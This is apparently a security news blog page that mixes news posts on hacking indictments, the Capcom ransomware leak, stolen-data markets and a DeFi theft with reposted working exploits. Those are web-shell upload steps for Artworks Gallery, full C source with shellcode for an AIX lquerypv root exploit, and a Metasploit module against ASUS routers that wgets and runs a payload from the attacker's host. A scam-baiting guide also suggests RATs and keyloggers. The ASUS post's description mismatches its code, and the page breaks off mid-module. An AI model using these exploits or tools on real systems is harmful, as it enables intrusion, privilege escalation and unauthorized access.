Wednesday, January 15, 2025
Home Blog Page 76

Chinese and Malaysian hackers charged by US over attacks

By
Steven Black (n0tst3)
-
0
114402071 mediaitem114402070
114402071 mediaitem114402070

The US Department of Justice (DoJ) has charged five Chinese and two Malaysian men with hacking more than 100 companies.

The two Malaysian businessman “conspired” with two of the Chinese hackers to target the video games industry in particular, the DoJ said.

They would obtain in-game items and currencies by fraud, hacking or other means, and sell on the digital items for real money, it added.

Both Malaysian men have been arrested.

The five Chinese men were “fugitives” in China, the DoJ added. The US does not have an extradition treaty with China.

The other three Chinese hackers targeted software developers, computer makers, social media companies and others, the indictment said.

Game over

Two of the Chinese hackers – named as Zhang Haoran and Tan Dailin, both 35 – supplemented their attacks on technology firms with hacking video game companies.

It is alleged that the two Malaysian men – Wong Ong Hua, 46, and Ling Yang Ching, 32 – worked with the Chinese hackers to attack the video game firms in the US, France, Japan, Singapore, and South Korea.

“Several of the Chinese defendants compromised the networks of video game companies worldwide. That’s a billion-dollar industry. And defrauded them of game resources,” Deputy Attorney General Jeffrey Rosen told reporters.

“Two of the Chinese defendants stand accused with two of the Malaysian defendants of selling those resources on the black market through their illicit website.”

Deputy Attorney General Jeffrey Rosen in front of a Department of Justice backdrop

At least nine known victim video game firms are listed in the indictment, but none are identified by name. Several are multinational firms, and at least one had multiple sub-companies.

Offensive attacks

Another of the indictments covered crimes including identity theft and money laundering by three of the Chinese men, which the DoJ said had affected more than 100 companies.

It said that Jiang Lizhi, 35, Qian Chuan, 39, and Fu Qiang, 37, worked as senior managers for a Chinese network security company.

But they also used their skills for “offensive” operations, it added.

The companies were located worldwide – not only in the US but also Australia, Brazil, Chile, India, Japan, Singapore, and elsewhere.

Microsoft, as well as Google, Facebook and Verizon all aided officials in the investigation and in cutting off the attack methods, the US government said.

Mr Rosen also blamed the Chinese state for allowing such activity to happen.

“The Department of Justice has used every tool available to disrupt the illegal computer intrusions and cyber-attacks by these Chinese citizens,” he said.

“Regrettably, the Chinese Communist Party has chosen a different path of making China safe for cybercriminals so long as they attack computers outside China and steal intellectual property helpful to China.”

Bookmark
Please login to bookmarkClose

Capcom hack: Up to 350,000 people’s information stolen

By
Steven Black (n0tst3)
-
0
capcom
capcom

Video-game-maker Capcom has warned a ransomware attack might have compromised gamers’ personal information.

Up to 350,000 people could be affected, it said, and some of its own financial information had been stolen.

The Japanese developer is best known for franchises such as Resident Evil, Street Fighter, and Monster Hunter.

A week-and-a-half earlier, it had said there was no indication customer information had been accessed.

Digitally scrambled

But in an update on Monday, Capcom confirmed its servers had been hit by an attack on 2 November.

Ransomware is malicious software that typically threatens to block a victim’s access to their own records unless a blackmail payment is made.

In this case, the attackers digitally scrambled some of the data on Capcom’s servers, making it impossible to view or amend, and destroyed some files outright.

The Ragnar Locker hacker group had then demanded to be paid to undo the encryption involved, Capcom said.

On Ragnor Locker’s dark-net webpage, the hackers didn’t just post Capcom’s data but also an ominous message.

In broken English they wrote the Japanese company didn’t “make a right decision and save data from leakage”.

This – and the fact Capcom is openly talking about the hack – suggests the company chose not to pay the cyber-criminals’ extortion demand.

Many, including law enforcement, would actually see this as absolutely the right decision.

For 18 months, police the world over have been desperately imploring ransomware victims not to pay hackers.

The groups have made millions from companies, which often feel they have no other option but to fork out.

But it seems Capcom has found a way through without yielding.

No doubt the incident has affected the firm’s reputation and some sensitive data is already surfacing online.

But reading the disappointment in Ragnor Locker’s statement is refreshing and rare.

So far, Capcom has confirmed only nine people’s personal information was definitely compromised, all current or former employees.

But up to 350,000 customers, business partners, and other employees might also be affected, it said.

Although, it could not be sure because its own logs had been “lost as a result of the attack”.

The information includes different combinations of names, addresses, birthdays, phone numbers and email addresses, depending on why the data was gathered.

For example, some was from Japanese customer support and some from the American Capcom store or e-sports operation.

‘Deepest apologies’

“None of the at-risk data contains credit-card information,” Capcom’s statement said.

“All online transactions… are handled by a third-party service provider.

“And as such, Capcom does not maintain any such information internally.”

The company also said it was safe for gamers to continue to play its games online and to use its websites.

Police have been notified, as have the Japanese and UK data-protection watchdogs.

“Capcom would once again like to reiterate its deepest apologies for any complications or concerns caused by this incident,” it said.

“As a company that handles digital content, it is regarding this incident with the utmost seriousness.”

Bookmark
Please login to bookmarkClose

Artworks Gallery Exploit 1.0 Shell Upload Vulnerability

By
Steven Black (n0tst3)
-
0
artworks exploit
artwotrkvuln

Artworks Gallery Exploit – Arbitrary File Upload – RCE (Authenticated)

CVE-2020-28688

[Security Risk Critical] [PHP Web Apps]

The add artwork functionality in ARTWORKS GALLERY IN PHP, CSS, JAVASCRIPT, AND MYSQL 1.0 allows remote attackers to upload arbitrary files.

*Artworks Gallery - Arbitrary File Upload - RCE (Authenticated) - Edit
Profile*
 
# Exploit Title: Artworks Gallery - Arbitrary File Upload - RCE
(Authenticated) - Edit Profile
# Date: November 17th, 2020
# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
# Vendor Homepage: Source Code & Projects (https://code-projects.org)
# Software Link: ARTWORKS GALLERY IN PHP, CSS, JAVASCRIPT, AND MYSQL (
https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf
)
# Version: 1.0
# Tested On: Windows 10 (XAMPP Server)
# CVE: CVE-2020-28687
-----------------------------------------------------------------------------------------------------------
*Proof of Concept:*
-----------------------------------------------------------------------------------------------------------
1. Authenticate as a user (or signup as an artist)
2. Go to edit profile
3. Upload a php-shell as profile picture and click update/save
4. Find your shell at 'http://<ip>/<base_url>/pictures/profile/<shell.php>'
and get command execution
 
 
----------
 
*Artworks Gallery - Arbitrary File Upload - RCE (Authenticated) - Add
Artwork*
 
# Exploit Title: Artworks Gallery - Arbitrary File Upload - RCE
(Authenticated) - Add Artwork
# Date: November 17th, 2020
# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
# Vendor Homepage: Source Code & Projects (https://code-projects.org)
# Software Link: ARTWORKS GALLERY IN PHP, CSS, JAVASCRIPT, AND MYSQL (
https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf
)
# Version: 1.0
# Tested On: Windows 10 (XAMPP Server)
# CVE: CVE-2020-28688
-----------------------------------------------------------------------------------------------------------
Proof of Concept:
-----------------------------------------------------------------------------------------------------------
1. Authenticate as a user (or signup as an artist)
2. Click the drop down for your username and go to My ART+BAY
3. Click on My Artworks > My Available Artworks > Add an Artwork
4. Click on any type of artwork and instead of the picture, upload your
php-shell > click on upload
5. Find your shell at 'http://<ip>/<base_url>/pictures/arts/<shell.php>'
and get command execution

Why not subscribe to our newsletter?

Bookmark
Please login to bookmarkClose

Cyber-crime Moves to the Cloud to Accelerate Attacks Amid Data Glut

By
RiSec.Mitch
-
0
podcast news wrap
podcast news wrap

A report on the underground economy finds that malicious actors are offering cloud-based troves of stolen data, accessible with handy tools to slice and dice what’s on offer.

Cybercriminals are embracing cloud-based services and technologies in order to accelerate their attacks on organizations and better monetize their wares, researchers have found. This is largely driven by cybercriminals who sell access to what they call “clouds of logs,” which are caches of stolen credentials and other data hosted in the cloud.

The cloud-based approach makes the information more easily available to interested buyers, who then turn around and use the data to conduct secondary attacks, according to Trend Micro. Malicious actors are offering “cloud-based tools [to buyers] for analyzing and extracting the data that they need to conduct [these] further malicious activities,” explained the firm in a Monday posting, which characterized the development as a relatively new approach.

The move to the cloud for cybercriminals has the same main benefit as it does for legitimate organizations: Speed. Trend Micro said that the time between an initial data heist to that stolen information being used against an enterprise has decreased from weeks to days or even hours when the cloud approach is taken.

“With the introduction of cloud-based services and technologies, criminals are equipped to steal, purchase and use data to conduct their attacks much faster when targeting organizations,” researchers said, using the analogy of the time it takes someone to buy their tools at a garage sale versus buying them from an online shopping site.

And with faster transactions in play, “organizations would not be able to anticipate the arrival and speedy execution of such attacks — ones enabled by stolen data and orchestrated by criminals with only a short amount of time, leaving them with less time to detect and respond.”

A Big Data Problem

Malicious actors are turning to the cloud in order to work more effectively with the sheer volume of data on offer in underground forums, researchers said. By Trend Micro’s estimation, the caches represent multiple terabytes-worth of data.

“In recent years, the theft of user credentials has been on the rise, with attackers collecting massive amounts of credentials and associated email addresses or domain names,” researchers explained. “[Other data stolen] often includes recorded keystrokes, authentication credentials to online portals, online banks, authenticated session attributes, personally identifiable information (PII), scans of documents, tax reports, invoices, bank account payment details (for example, credit cards), and more.”

Exacerbating the situation is the fact that data exfiltration has become de rigueur for almost any type of attack, including ransomware, botnets, keyloggers, exploit kits and other malicious components.

“In addition to what was previously mentioned, this collected information might contain browsing history, cookies, keystrokes, user credentials, authentication tokens, information about the victim environment that can be used to evade anti-fraud systems, and more,” researchers said.

All of this means that cybercriminals have a Big Data problem – again, just like legitimate organizations. It’s hard to exploit the full potential of such a colossal amount of data without tools for slicing and dicing it.

This has paved the way for a pay-for-access business model that allows cybercriminals to better monetize their ill-gotten goods while enabling other attackers to easily identify the data that they will need from sellers’ clouds of logs for their attacks.

Pay-for-Access in the Cloud Economy

Customers pay to access the “clouds of logs” using helpful cloud tools at varying price ranges, Trend Micro found.

Packages that only allow limited access and downloads are in the hundred-dollar range. Monthly subscription rates are also offered, with some cybercriminals pricing them within the $300 to $1,000 per-month range.

“[One actor] claims to update their dataset with new stolen accounts on a weekly basis,” according to the firm. “The service offers a premium subscription for $300 for the first four customers, while further access is priced at $1,000.”

In another instance, an advertisement of a service guarantees updates of new batches of data ranging from 20,000 to 30,000 logs every one to two weeks. A monthly subscription costs $1,000, while a semiannual subscription costs $5,000.

The data can be separated by country or region, data type, whether or not the logs have been used before in other campaigns, victim organization name or sector, and other parameters.

“Criminals only need to search for the data that they need in order to find an opportunity to commit a crime faster; after all, they won’t have to do the task of obtaining data by themselves anymore,” the firm explained.

Criminals who buy access to these datasets also vary in their specializations, according to Trend Micro.

“Some of these criminals primarily focus on carding activities, while others specialize in attacking financial institutions and seek banking credentials,” according to the report. “Credentials for accessing cloud platform portals are also sold to those criminals who specialize in selling bulletproof-dedicated services. Such credentials could be used to spawn instances of virtual machines that are then sold in underground markets.”

As discussed earlier, many sellers also limit the number of people who can access and buy logs. They also implement data watermarking and other tracking methods to enforce their service-level agreements (SLA).

“Among these restrictions are fixed quotes on the total number of accessed objects per day, a restriction on the number of files permitted for download, or the implementation of traffic-shaping policies,” according to Trend Micro. “Other platforms also restrict access to the cloud to one device per account. Some also require private VPN credentials to initiate access to the service.”

Future is Cloudy

With the growing business of selling access to clouds of logs, various monetization schemes could arise in the future, according to Trend Micro.

“For instance, cybercriminals could look for records of authenticated user sessions to cloud portals,” the firm explained. “If a malicious actor hijacks an active console session from a cloud service provider, they could have full control of the victim’s cloud resources. This could mean gaining access to existing cloud systems and storage. The actors could then sniff valuable data from these resources, which they could in turn exfiltrate and sell in the underground.”

Researchers also foresee malicious actors developing tools powered by machine learning (ML) to speed up data extraction and analysis processes.

“Although we have only seen tools with limited capacities as of writing, we believe that the development of ML-powered tools — ones that can scale much larger datasets at a faster rate — is the next logical step for criminals as the market matures,” the report concluded

Bookmark
Please login to bookmarkClose

Facebook Data Haul of 13 Million Records Exposed By Sloppy Hackers

By
Steven Black (n0tst3)
-
0
fb
fb

Security researchers have uncovered a major Facebook scam exploiting hundreds of thousands of users, after the scammers left an Elasticsearch server unsecured.

Among the 5.5GB haul discovered by vpnMentor on September 21, was 150,000-200,000 Facebook usernames and passwords, and personal info including emails, names and phone numbers for hundreds of thousands who had fallen victim to a Bitcoin scam.

The two datasets are part of the same operation: the first group were tricked into handing over their account log-ins by a fake app promising to reveal who had recently visited their profile. With these log-ins, the scammers hijacked the victims’ accounts and posted comments on their Facebook posts, with links directing individuals to a Bitcoin fraud scheme.

In total, the exposed database contained 13.5 million records, also including domains used in the scheme and text outlines related to the Facebook comments the fraudsters would post.

Although the data came from a relatively short window, June-September 2020, there are fears the scheme may have originally been much bigger. At the time it was registered by Shodan, the database contained 11GB of data relating to the scheme, rather than 5.5GB, meaning many more victims may have been affected.

The database was then wiped by the Meow attack the day after vpnMentor discovered it. New data immediately started to appear again before those in charge finally secured the server.

With access to users’ Facebook accounts, the cyber-criminals behind this campaign have a highly monetizable resource for posting malicious links to scams, launching follow-on phishing or identity fraud attempts, blackmail and credential stuffing of other accounts, vpnMentor warned.

“If you’re a Facebook user and think you’ve been a victim of this fraud, change your login credentials immediately. Furthermore, if you reused your Facebook password on any other accounts, change it immediately to protect them from hacking,” the firm said.

“We recommend using a password generator to create unique, strong passwords for every private account you have, and changing them periodically. Never provide usernames and passwords for Facebook, email or financial accounts to external websites.”

Bookmark
Please login to bookmarkClose

Crypto Firm Akropolis Offers $200,000 Bug Bounty to Hacker Who Stole $2m

By
Steven Black (n0tst3)
-
0
profit
profit

$2m in funds was stolen from Akropolis last week. Akropolis has since offered a bug bounty to the hacker who stole the crypto currency.

Gibraltar-based Akropolis was attacked on Thursday, when an individual exploited a bug in the deposit logic of its SavingsModule smart contract to make off with a little over two million in DAI virtual currency.

However, the firm’s security company PeckShield claimed to have located the attacker’s Ethereum account, where the funds were transferred to, and said it is monitoring it for any further movement.

This could make it more challenging for the attacker to launder those funds, which might be why Akropolis published an open letter to them over the weekend.

“We have not contacted any form of law enforcement to pursue a criminal investigation. We would like to propose that you return the funds of our community members within 48 hours and in return we will offer a $200,000 USD bug bounty. We will take measures to protect your identity as required,” it said.

“If you decide not to co-operate we will pursue criminal action and contact law enforcement. We hope that we can work together towards a resolution, thank you for your time.”

In the meantime, Akropolis said it has fixed the issue at a contract level, performed an internal investigation with auditors and an external one with investors and exchange partners.

An attack on another decentralized finance (DeFi) protocol firm, Harvest Finance, at the end of October led to the theft of $24m. On that occasion the firm offered a $100,000 reward for the first person to contact the attacker and help them return the funds.

Bookmark
Please login to bookmarkClose

AIX 5.3L /usr/sbin/lquerypv local root privilege escalation

By
RiSec.Mitch
-
0
aixvuln
aixvuln

[Security Risk Critical] [local exploits] [AIX] [verified]

AIX 5.3L /usr/sbin/lquerypv Local Root Privilege Escalation Exploit

AIX5.3L includes a setuid root binary "lquerypv" which contains a stack-based* overflow in the handling of -V command line argument. However, prior to the * vulnerability being triggered the binary drops privileges. On AIX you can * restore the dropped privileges using seteuid() which results in a local root* LPE vulnerability.

/*AIX 5.3L /usr/sbin/lquerypv local root privilege escalation 
* ===========================================================
* AIX5.3L includes a setuid root binary "lquerypv" which contains a stack-based
* overflow in the handling of -V command line argument. However, prior to the 
* vulnerability being triggered the binary drops privileges. On AIX you can 
* restore the dropped privileges using seteuid() which results in a local root
* LPE vulnerability.
* 
* e.g
* bash-4.4$ ls -al `which lquerypv`;id;uname -a;oslevel
* -r-sr-xr-x   1 root     system        27160 Apr 28 2006  /usr/sbin/lquerypv
* uid=202(user) gid=1(staff)
* AIX aix53l 3 5 000772244C00
* 5.3.0.0
* bash-4.4$ ./aix53l-lquerypv
* [ AIX 5.3L /usr/sbin/lquerypv local root privilege escalation exploit
* # id
* uid=202(user) gid=1(staff) euid=0(root)
*
* -- Hacker Fantastic 
* (https://hacker.house)
*/
#include <stdio.h>
#include <stdlib.h>
#include <memory.h>
#include <unistd.h>
 
char shellcode[]="\x7f\xff\xfb\x78" /* mr      r31,r31 (nop)          */
                 "\x7c\x84\x22\x78" /* xor     r4,r4,r4         */
                 "\x7e\x94\xa2\x79" /* xor.    r20,r20,r20            */
                 "\x40\x82\xff\xfd" /* bnel    (setreuidcode)         */
                 "\x7e\xa8\x02\xa6" /* mflr    r21                    */
                 "\x3a\xb5\x01\x40" /* cal     r21,0x140(r21)         */
                 "\x88\x55\xfe\xe0" /* lbz     r2,-288(r21)           */
                 "\x7e\x83\xa3\x78" /* mr      r3,r20                 */
                 "\x3a\xd5\xfe\xe4" /* cal     r22,-284(r21)          */
                 "\x7e\xc8\x03\xa6" /* mtlr    r22                    */
                 "\x4c\xc6\x33\x42" /* crorc   cr6,cr6,cr6            */
                 "\x44\xff\xff\x02" /* svca                           */
                 "\xaa\x06\xff\xff" /* 0xaa = seteuid 0x06 = execve   */
                 "\x38\x75\xff\x04" /* cal     r3,-252(r21)           */
                 "\x38\x95\xff\x0c" /* cal     r4,-244(r21)           */
                 "\x7e\x85\xa3\x78" /* mr      r5,r20                 */
                 "\x90\x75\xff\x0c" /* st      r3,-244(r21)           */
                 "\x92\x95\xff\x10" /* st      r20,-240(r21)          */
                 "\x88\x55\xfe\xe1" /* lbz     r2,-287(r21)           */
                 "\x9a\x95\xff\x0b" /* stb     r20,-245(r21)          */
                 "\x4b\xff\xff\xd8" /* bl      (setreuidcode+32)      */
                 "/bin/sh";
 
int main(int argc,char* argv[]){
        char *env[] = {NULL};
        char *buffer = malloc(2048);
        long ptr;
        char *argp[] = {"lquerypv","-V",buffer,NULL};
        setreuid(0,0);
        if(!buffer){
                printf("[ malloc() failure\n");
                exit(-1);
        }
        printf("[ AIX 5.3L /usr/sbin/lquerypv local root privilege escalation exploit\n");
        memset(buffer,0,2048);
        memset(buffer,'\x90',1044);
        ptr = (long)buffer + 1043;
        memcpy((void*)ptr,"\x2f\xf2\x2b\x54",4); //0x2ff22b54
        memcpy(buffer,(void*)&shellcode,strlen((char*)&shellcode));
        execve("/usr/sbin/lquerypv",argp,env);
}
Bookmark
Please login to bookmarkClose

Scam Baiting (Scum-baiting) with a Windows 10 Host using Oracle’s vBox

By
RiSec.Mitch
-
0
typical popup scam
typical popup scam

How to Scam Bait ( Scum Baiting )

Contents:

  • A: What is scam-baiting ?
  • B: How do I set up a scam-baiting environment with VirtualBox?
    • Installing VirtualBox
    • Creating a new Virtual Machine
    • Installing Windows 10
  • C1: Disguising your Virtual Machine
  • C2: Further Disguising
  • D: Further Scam Baiting tools
  • E/F: Some Scam Baiting YouTubers/Suggestions and resources

A: What is scam-baiting?

Scam-baiting is the art of wasting a scammer’s time in order to prevent real people from being affected by the scammer. Scam-baiting may also extend to more serious actions such as deleting files, locking scammer’s out of their computer, gathering information on scammers and more. Whilst these further activities are illegal, the chances of being raided by the police for messing with fraudulent scammers are pretty slim. However, it is still advised to take basic anonymity precautions.

B: How do I set up a scam-baiting environment with VirtualBox?

Setting up a scam-baiting environment is not as hard as some people may think. Here is a full guide on how to do just that:

Installing VirtualBox:

Firstly, you’ll need to install VirtualBox. It is recommended that you use the latest version. To do this, download VirtualBox here.

After the file has been downloaded, install the file like how you would normally install the software (e.g. Windows uses its installer wizard). After installing VirtualBox, run it. You should come across a screen that looks like this:

scam baiting, scam bait guide, how to scam bait, scum bait

Creating a new Virtual Machine:

When creating a new Windows 10 Virtual Machine, some users may find it hard to set it up correctly, even after downloading their Windows 10 ISO file – the same thing happened to me. However, now that I have the knowledge, it’s actually incredibly easy, it’s just that most first-time users wouldn’t think of doing it. So, here is how to set up your Windows 10 Virtual Machine!

  • Download the Windows 10 ISO file.
  • Head to the main screen of the VirtualBox application and click the blue New button.
  • Name the Virtual Machine whatever you want and select its types as Microsdt Windows and its version as Windows 10 (64-bit).
  • Allocate the machine however much RAM you want (Personally, I use 4 GB of RAM for my VMs, but you can use down to 2 GB).
  • Ensure the following is selected
    • “Create a virtual hard disk now,” and click next.
    • “VDI (VirtualBox Disk Image),” and then click next.
    • “Dynamically allocated,” and click next.
  • Give the machine a reasonable amount of space (Enough for the OS’ files and your own usage).
  • After creating the machine, highlight the machine by clicking it once, then click the orange Settings button.
  • Head to the Storage section via the left pannel.
  • You should see a disc icon that says, “Empty”. Click this to hightlight it.
  • After highlighting the disc, on the right pannel there should be a label that reads, “Attributes”. Underneath this label you should see another label that reads, “Optical Drive:” along with a drop down menu beside it. Next to the drop down menu, click the small blue disc icon, then select, “Chose Virtual Optical Disk File”.
  • Select the Windows 10 ISO file that you downloaded earlier. After selecting the ISO file, press OK to close the Settings window.
  • Highlight the Virtual Machine you just created and click the green Start button. From there, the machine will power on and begin installing Windows 10.

Installing Windows 10:

Before installing Windows 10 for your scam-baiting, there are some important considerations you should take note of…

  • When Windows 10 asks for an activation key, click the option to activate Windows 10 later (Which, of course, you wont).
  • Install Windows 10 Pro; it will give you access to regedit.
  • Never use your real information. When Windows 10 asks for your Microsoft account’s e-mail, choose the option to make a brand new outlook account. Furthermore, when Windows 10 asks you for its back-up account, you may want to use a random throwaway e-mail as well (For example, my throwaway email is cle************@protonmail.com); my real name does not begin with, “cle”.
  • Refuse all offers/services. This includes finding your device, knowing your location, using your voice, etc.
  • When setting your account’s password, do not make it a password you use for your host machine or any services you use.

C1: Disguising your Scam Baiting Virtual Machine.

The following guide is based upon this video by UncleUdink.

One of the most important things to do with a Virtual Machine is to hide the fact that it is a Virtual Machine from scammers. Most scammers nowadays will check to see if the machine that they are connected to is a Virtual Machine or not to see if they are being baited and – if they find out it is a Virtual Machine, will usually disconnect and hang up. You can disguise a Oracle Virtual Machine by doing the following:

  • Download the vBoxSysInfoMod tool (If you have a GitHub account, as well as starring this page, remember to star the official vBoxSysInfoMod page). Then, run the vBox System Info Mod.bat file and follow the instructions in the terminal (For system manufacturer, you can use Dell – for system model, you can use any Dell Model (e.g. Optiplex 745)). Note that you must stop your Virtual Machine if it is running to avoid corruption.
  • After this process is complete, you can take the following steps within the Virtual Machine to further hide your machine from scammers:
    • Run regedit using the run window (Win+R) and navigate the following path: HKEY_LOCAL_MACHINE ➡️ SOFTWARE ➡️ Microsoft ➡️ Windows ➡️ CurrentVersion ➡️ Uninstall. Within this path, you should see a folder named, “Oracle VM VirtualBox Additions”. Delete this folder, as it will prevent the scammer viewing it in appwiz.csl (If the folder does not exit, you have no need to worry!).
    • Following this, you then want to navigate to the following path: HKEY_LOCAL_MACHINE ➡️ SYSTEM ➡️ ControlSet001.
    • Within this path, you should see a folder named, “Enum”. Right click the folder and click, “Permissions”. Then, click the, “Add” button and enter your Virtual Machine’s username in the text box. After entering the username, click the, “Check Names” button then click OK. Finally, go to the option your just added and check, “Allow full control” then click, “Apply”.
    • From here, click the, “Advanced” button. At the top of the pop-up, click the, “Change” link and, again, enter your Virtual Machine’s username into the text bot, then click, “Check Names” then click OK. Then, click, “Apply”.
    • Next, re-open the Advanced menu and check the, “Replace all child obejct…” check box. Then, click, “Apply” again and OK (Do not be alarmed at the checkbox becoming unchecked after applying).
    • Here is the tedious part. Right click the, “Enum” folder and click find. From there, enter the following hash: 4d36e967-e325-11ce-bfc1-08002be10318 and click, “Find Next”. Now, right click the, “FriendlyName” option, click, “Modify” and change the value to, “Samsung 50 GB ATA”.
    • Next, right click the, “Enum” folder again and click find. Enter the following hash: 4d36e968-e325-11ce-bfc1-08002be10318 and modify the “DeviceDesc” to, “Nvidea Geforce GTX 1080”.
    • Next, right click the, “Enum” folder again and click find. Enter the following hash: 4d36e965-e325-11ce-bfc1-08002be10318 and modify the, “FriendlyName” to, “NEC DVD-RW SATA DVD01”.
    • Finally, right click the, “Enum” folder again and click find. Enter the following hash: 4d36e96f-e325-11ce-bfc1-08002be10318 and modify the, “DeviceDesc” to, “Microsoft Pointing Device”. Now click F3 Twice and modify the next, “DeviceDesc” to, “Microsoft USB Pointing Device”.

C2: Further disguising:

So, you’ve changed all the complicated settings, good job! (WARNING: IF USING VIRTUALBOX GUEST ADDITIONS, CLOSE THE TRAY ICONS USING THE TASK MANAGER. FURTHERMORE, YOU SHOULD DISABLE THE TASK MANAGER AND BLAME IT ON A VIRUS. FURTHERMORE, EJECT THE GUEST EDITIONS CD FROM THE D: DRIVE.)

However, a fresh PC is going to look suspicious, so remember to use Ninite to install some applications in the Virtual Machine (Download the files to your Virtual Machine, not your host).

Furthermore, you will also want to use a custom Desktop Background. There is an easy way to do this without an activation key. Simply download a picture from the internet onto your desktop. Then, move it to the Windows 10 file in the following path: C:\Windows\Web\Wallpaper\Windows 10. After this, simply right click the image and click, “Set as desktop background.” Note that you can not adjust its crop, so choose an image that roughly fits the Virtual Machine’s resolution.

Before saving a screenshot of your Virtual Machine, check you have done the following:

  1. Editied the Virtual Machine using vmSysInfoMod tool.
  2. Removed the Guest Additions folder from Regedit if using Guest Additions.
  3. Edited each of the four hash’s set values asked of you to edit.
  4. Installed some applications to make yourself appear innocent.
  5. Changed the desktop background to match the pretend-victims personality.
  6. Removed the guest addition tray icons using the task manager if using Guest Additions.
  7. Disabled the task manager after this if using Guest Additions.

If all of these requirements are met, save a screenshot of the machine.

This can be done using the top menu of the Virtual Box window: Machine -> Take Snapshot. Then, every time you finish a scam bait when powering off the machine check the, “Restore to ” check box to revert back to this finished set-up state.

D: Further scam-baiting tools.

  • Google Hangouts, BobRTC, TextNow and Telegram are all good, free alternatives to FireRTC, which is essentially dead.
  • You can use a RAT Creator (At your own risk!) and port forwarding to get access to a scammer’s computer without the VM, using the VM as a service for which the scammer should download and run the file.
  • You can use fake name generator to give you several fake details.

E: Find scammers fast ( How to find scammers )

F: Some scam-baiting YouTubers:

Scam baiting
Scambaiting (or scam baiting) is a form of Internet vigilantism primarily used towards advance-fee fraud, IRS impersonation scam, technical support scams

ORIGNINAL ARTICLE: https://github.com/Catterall/Scambaiting-Setup & UncleUdink.

The Top Ten Best Scambaiting Hacks & Tools

1. WINSPY KEYLOGGER
2. VIRUS SCRIPTS
3. VIRTUAL MACHINE
4. GOOD DIALOGUE
5. SCREEN RECORDER
6. VOIP PHONE DIALER
7. VOICE CHANGER
8. TEAMVIEWER (Reverse Connection)
9. LINGOBLASTER
10. MACROS (Want)
11. VPN (Virtual Private Network)
12 OSINT (Intelligence Gathering on scammers)

We hope you enjoyed this article

Why not subscribe to the Real Info Security, CyberSecurity Newsletter?

Bookmark
Please login to bookmarkClose

ASUS TM-AC1900 Arbitrary Command Execution Exploit

By
Steven Black (n0tst3)
-
0
image 2020 11 15 100938
image 2020 11 15 100938

This Metasploit module exploits an arbitrary file upload vulnerability in HorizontCMS 1.0.0-beta in order to execute arbitrary commands.

The module first attempts to authenticate to HorizontCMS. It then tries to upload a malicious PHP file via an HTTP POST request to /admin/file-manager/fileupload

The server will rename this file to a random string. The module will therefore attempt to change the filename back to the original name via an HTTP POST request to /admin/file-manager/rename. For the php target, the payload is embedded in the uploaded file and the module attempts to execute the payload via an HTTP GET request to /storage/file_name

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking
   
    include Msf::Exploit::Remote::HttpServer
    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::EXE
    include Msf::Exploit::FileDropper
   
    def initialize(info = {})
      super(update_info(info,
        'Name'           => 'ASUS TM-AC1900 - Arbitrary Command Execution',
        'Description'    => %q{
          This module exploits a code execution vulnerability within the ASUS
          TM-AC1900 router as an authenicated user. The vulnerability is due to 
          a failure filter out percent encoded newline characters (%0a) within 
          the HTTP argument 'SystemCmd' when invoking "/apply.cgi" which bypasses 
          the patch for CVE-2018-9285.
    
        },
        'Author'         =>
          [
            'b1ack0wl' # vuln discovery + exploit developer
          ],
        'License'        => MSF_LICENSE,
        'Platform'       => 'linux',
        'Arch'           => ARCH_ARMLE,
        'References'     =>
          [
            # CVE which shows that this functionality has been patched before ;)
            ['URL', 'https://www.cvedetails.com/cve/CVE-2018-9285/'],
            ['URL', 'https://github.com/b1ack0wl/OffensiveCon20/tree/master/TM-AC1900']
          ],
        'Privileged'     => true,
        'Targets'        =>
          [
            # this may work on other asus routers as well, but I've only tested this on the TM-AC1900.
            [ 'ASUS TM-AC1900 <= v3.0.0.4.376_3199',
              {}
            ]
          ],
        'DisclosureDate' => 'April 18, 2020',
        'DefaultTarget' => 0))
      register_options(
          [
            OptString.new('USERNAME', [true, 'Username for the web portal.', 'admin']),
            OptString.new('PASSWORD', [true, 'Password for the web portal.', 'admin'])
          ])
    end
   
    def check_login
      begin
        res = send_request_cgi({
          'method'  => 'GET',
          'uri'     => "/Main_Analysis_Content.asp",
          'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
        })
        if res and res.code == 200
          # all good :)
          return res
        else
          fail_with(Failure::NoAccess, 'Invalid password.')
        end
      rescue ::Rex::ConnectionError
          fail_with(Failure::Unreachable, 'Connection failed.')
      end
    end
   
    def on_request_uri(cli, request)
      if request.uri == '/'
        # injected command has been executed
        print_good("Sending bash script...")
        @filename = rand_text_alpha(16)
        bash_script = %Q|
        #!/bin/sh
        wget #{@lhost_srvport}/#{rand_text_alpha(16)} -O /tmp/#{@filename}
        chmod +x /tmp/#{@filename}
        /tmp/#{@filename} &
        |
        send_response(cli, bash_script)
      else
        # bash script has been executed. serve up the ELF file
        exe_payload = generate_payload_exe()
        print_good("Sending ELF file...")
        send_response(cli, exe_payload)
        # clean up
        register_file_for_cleanup("/tmp/index.html")
        register_file_for_cleanup("/tmp/#{@filename}")
      end
    end
   
    def exploit
      # make sure the supplied password is correct
      check_login
      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
        srv_host = datastore['LHOST']
      else
       srv_host = datastore['SRVHOST']
      end
      print_status("Exploiting #{target.name}...")
      @lhost_srvport = "#{srv_host}:#{datastore['SRVPORT']}"
      start_service({'Uri' => {'Proc' => Proc.new { 
        |cli, req| on_request_uri(cli, req)
        },
          'Path' => '/'
      }})
      begin
        # store the cmd to be executed
        cmd =  "ping+-c+1+127.0.0.1;cd+..;cd+..;cd+tmp;rm+index.html;"
        cmd << "wget+#{@lhost_srvport};chmod+777+index.html;sh+index.html"
        res = send_request_cgi({
          'method'        => 'GET',
          'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
          # spaces need to be '+' and not %20, so cheap hack.exe it is.
          # required HTTP args: SystemCmd, action_mode, and current_page
          'uri'           => "/apply.cgi?SystemCmd=#{cmd.gsub(';',"%0a")}&action_mode=+Refresh+&current_page=Main_Analysis_Content.asp"
        })
        # now trigger it via check_login
        res = check_login
        if res and res.code == 200
          print_status("Waiting up to 10 seconds for the payload to execute...")
